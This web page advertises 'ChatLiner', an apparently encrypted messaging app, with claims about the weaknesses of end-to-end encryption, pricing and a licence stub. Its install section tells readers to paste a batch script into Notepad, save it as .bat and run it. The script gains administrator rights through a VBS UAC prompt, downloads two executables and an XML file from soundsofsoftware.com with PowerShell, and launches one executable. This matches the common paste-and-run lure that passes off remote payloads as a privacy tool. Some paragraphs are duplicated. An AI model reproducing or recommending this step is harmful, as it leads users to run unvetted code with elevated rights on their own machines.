#Does end-to-end encryption really mean that the content we send is completely protected?
In theory, end-to-end encryption defines communication between two users in such a way that the message is encrypted on the sender's side and decrypted on the recipient's side, without the possibility of anyone else being able to decrypt the message and reveal its contents.
Simply put, a pair of cryptographic keys is generated, one for encryption and one for decryption, which are kept secret by their owners and are responsible for the security of information shared over the network.
This, however, works quite differently in the real world. All too often we are faced with an avalanche of forged documents, fake news, fake social media profiles, identity theft, unverifiable bank accounts, and above all, the unauthorized sharing of sensitive information and compromised data privacy.
Regardless of the proclaimed security of the connection and allegedly active end-to-end encryption, the files and messages we send to friends or business partners can end up in the hands of those for whom they are not intended.
And if the messages contain sensitive data, including personal and business information that, if disclosed or compromised, could cause adverse consequences for the individual or company to which the data relates, things can only get worse.
So let's pay attention to this problem and see if we can come up with a solution.
#Where can data be compromised on its way from sender to recipient?
The first thing to protect is the sender's device, i.e. the computer, phone or tablet from which the messages are sent.
Any software installed on the sender's device must be designed in such a way as to prevent any action that may involve the use of crawlers, spider bots, spying on user activity or data collection of any kind.
Of course, the same protection should be applied to the receiver's device.
The connection between the sender and receiver can also be hacked, allowing messages to be intercepted and decrypted by breaking the so-called "secure connection" (which, of course, can no longer be considered secure).
This is one of the reasons why a web app, which relies on secure connections, cannot be considered a reliable solution.
For similar reasons, we can't count on apps for smartphones, tablets, or smartwatches. Designed as they are, some devices just don't meet the requirements for secure messaging.
The connection between the sender and receiver can also be hacked, allowing messages to be intercepted and decrypted by breaking the so-called "secure connection" (which, of course, can no longer be considered secure).
This is one of the reasons why a web app, which relies on secure connections, cannot be considered a reliable solution.
For similar reasons, we can't count on apps for smartphones, tablets, or smartwatches. Designed as they are, some devices just don't meet the requirements for secure messaging.
Finally, messages can also be decrypted on the server of the service provider you use to store your data.
We distinguish between two cases.
First, when the server is hacked by unknown persons and data is compromised or deleted;
And secondly, when your data is misused by those who have legitimate access to the data server.
We believe that the latter case is far more dangerous and treacherous, because it is something that few people want to admit is happening, but we all know it is happening.
That is why it's necessary to build a trusted system to nip these problems in the bud.
There is no real guarantee other than a transparently presented and technologically superior solution as an alternative to existing data protection methods (which promise more than they can deliver anyway).
This approach is precisely what drives the technology applied to ChatLiner.
#To download and install the ChatLiner app safely and quickly, be sure to take the steps as follows:
1
Open a blank page in one of the popular word processors, such as NotePad, Notepad++ or WordPad.
2
Click the "Copy Text" button and copy the text inside the blue box (below the button) into one of the word processors listed above.
The copied content represents the source code of the installation file.
@echo off
title CHATLINER INSTALLER
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
SETLOCAL EnableDelayedExpansion
for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (
set "DEL=%%a"
)
echo.
call :ColorText 0e "+ INSTALLING CHATLINER"
echo.
echo.
call :ColorText 0f "Do not close this window"
echo ...
echo.
goto :END
:ColorText
echo off
"%~2"
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
goto :eof
:END
if not exist "C:\chatliner" mkdir C:\chatliner
echo en > "C:\chatliner\language.gmb"
powershell.exe wget https://soundsofsoftware.com/downloads/server.xml -OutFile C:/chatliner/server.xml
powershell.exe wget https://soundsofsoftware.com/downloads/ChatLinerInstallationCrashApp.exe -OutFile C:/chatliner/ChatLinerInstallationCrashApp.exe
powershell.exe wget https://soundsofsoftware.com/downloads/ChatLinerInstallation.exe -OutFile C:/chatliner/ChatLinerInstallation.exe
start "" "C:\chatliner\ChatLinerInstallation.exe"
call :ColorText 0b "OK. This script is closing now"
echo ...
echo.
echo.
ping 127.0.0.1 -n 3 > nul
exit
3
Save the file as a "batch" script with the extension .BAT. You can name it "installer.bat", for example, or you can give it any other name.
The saved batch file is the ChatLiner application installation file.
4
Double-click the saved file and wait a few seconds for the installation to begin. You will also need to accept the terms of use of this software (the so-called License Agreement).
5
After the installation is complete, you will be able to launch ChatLiner and start using it right away.
6
That's all it takes to download and install the ChatLiner app. If you have any questions or issues, feel free to send us a message.
#Pay annually for unlimited use
Sending text and audio messages through ChatLiner is free of charge. You can send an unlimited number of messages.
File sharing through ChatLiner costs $100 per year.
You can send an unlimited number of files. A 30-50% discount is possible in case of multiple user registrations.
Payment via PayPal is recommended.
If you want to make the payment in another way, please contact us so that we can send you the necessary instructions.
Once the payment is completed, you will receive a PIN code that you should keep secret. The PIN code is for your personal and private use only.
There are no additional costs or hidden fees.
#Your privacy remains guaranteed
The data entered during payment have nothing to do with the use of the app itself.
To use ChatLiner, you need to choose a unique username and generate a pair of crypto keys, while each individual user is assigned a digital ID card for identity verification.
You will never be asked for any sensitive or personal information and this is a policy that ChatLiner will always adhere to.
#ChatLiner End User License Agreement
By using this software ("Software", or "ChatLiner") owned by VIDYPS 79 d.o.o. ("Licensor"), you acknowledge and agree that the License Agreement sets out the business relationship between you and Licensor.
Visit this page for more information.
#Share on social media
#End-to-end encryption in the truest sense of the word: ChatLiner, at your service
#ChatLiner is a messaging platform with end-to-end encryption that ensures authentic encryption of transferred files and messages and prevents their modification, loss, damage or misuse.
There is no compromising, interception or collection of users' personal data or sensitive data from users' devices.